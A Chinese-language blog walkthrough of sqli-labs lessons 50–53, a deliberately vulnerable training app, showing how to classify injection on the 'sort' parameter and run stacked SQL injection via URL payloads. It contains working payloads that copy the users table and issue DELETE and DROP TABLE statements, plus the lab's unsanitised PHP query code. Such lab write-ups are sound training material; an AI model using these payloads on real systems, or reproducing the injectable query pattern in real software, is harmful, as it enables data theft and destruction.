sqli-labs 通关指南:Less 50 ~ 53

Less 50 ~ 53 和 Less 46 ~ 49 的注入方法完全一样,但是这 4 个 Less 可以进行堆叠注入。

Less 50

判断注入类型

输入正常的参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

?sort=1'


将后面的内容注释掉,网页返回错误的信息。进行下面的所有测试,得出此处存在数值型注入。

?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

堆叠注入

和 Less 46 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

SQL 查询语句

$sql = "SELECT * FROM users ORDER BY $id";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
      ?>
      <center>
      <font color= "#00FF00" size="4">
		
      <table   border=1'>
      <tr>
            <th>&nbsp;ID&nbsp;</th>
            <th>&nbsp;USERNAME&nbsp;  </th>
            <th>&nbsp;PASSWORD&nbsp;  </th>
      </tr>
      </font>
      </font>
      <?php
      /* store first result set */
      if ($result = mysqli_store_result($con1))
      {
            while($row = mysqli_fetch_row($result))
            {
	          echo '<font color= "#00FF11" size="3">';		
		  echo "<tr>";
		  echo "<td>";
		  printf("%s", $row[0]);
		  echo "</td>";
		  echo "<td>";
		  printf("%s", $row[1]);
		  echo "</td>";
	          echo "<td>";
		  printf("%s", $row[2]);
		  echo "</td>";
		  echo "</tr>";
		  echo "</font>";
	    }
      }
      echo "</table>";
}

Less 51

判断注入类型

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页返回错误信息。

?sort=1'

将后面的内容注释掉,网页返回正常的信息,得出此处存在单引号闭合的字符型注入。

?sort=1'--+

堆叠注入

和 Less 47 一样使用报错注入或时间注入就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

SQL 查询语句

$sql="SELECT * FROM users ORDER BY '$id'";

Less 52

判断注入类型

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

?sort=1'


将后面的内容注释掉,网页无回显。进行下面的所有测试,得出此处存在数值型的盲注。

?sort=1'--+
?sort=1')--+
?sort=1'))--+
?sort=1"--+
?sort=1")--+
?sort=1"))--+

堆叠注入

和 Less 48 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

?sort=1;CREATE TABLE WhiteMoon LIKE users;--+
?sort=1;INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1;DELETE FROM WhiteMoon;--+
?sort=1;DROP TABLE WhiteMoon;--+

SQL 查询语句

$sql = "SELECT * FROM users ORDER BY $id";

Less 53

判断注入类型

输入正常参数,网页回显用户名列表。对 sort 参数使用单引号闭合,网页无回显。

?sort=1'


将后面的内容注释掉,网页用户名列表,得出此处存在单引号闭合的字符型的盲注。

?sort=1'--+

堆叠注入

和 Less 49 一样使用时间盲注就可以完成,此处用于测试堆叠注入。使用堆叠查询完成 Less 38 的样例。

?sort=1';CREATE TABLE WhiteMoon LIKE users;--+
?sort=1';INSERT INTO WhiteMoon SELECT * FROM users;--+
?sort=1';DELETE FROM WhiteMoon;--+
?sort=1';DROP TABLE WhiteMoon;--+

SQL 查询语句

$sql="SELECT * FROM users ORDER BY '$id'";
posted @ 2020-11-18 00:40  乌漆WhiteMoon  阅读(1144)  评论(0编辑  收藏  举报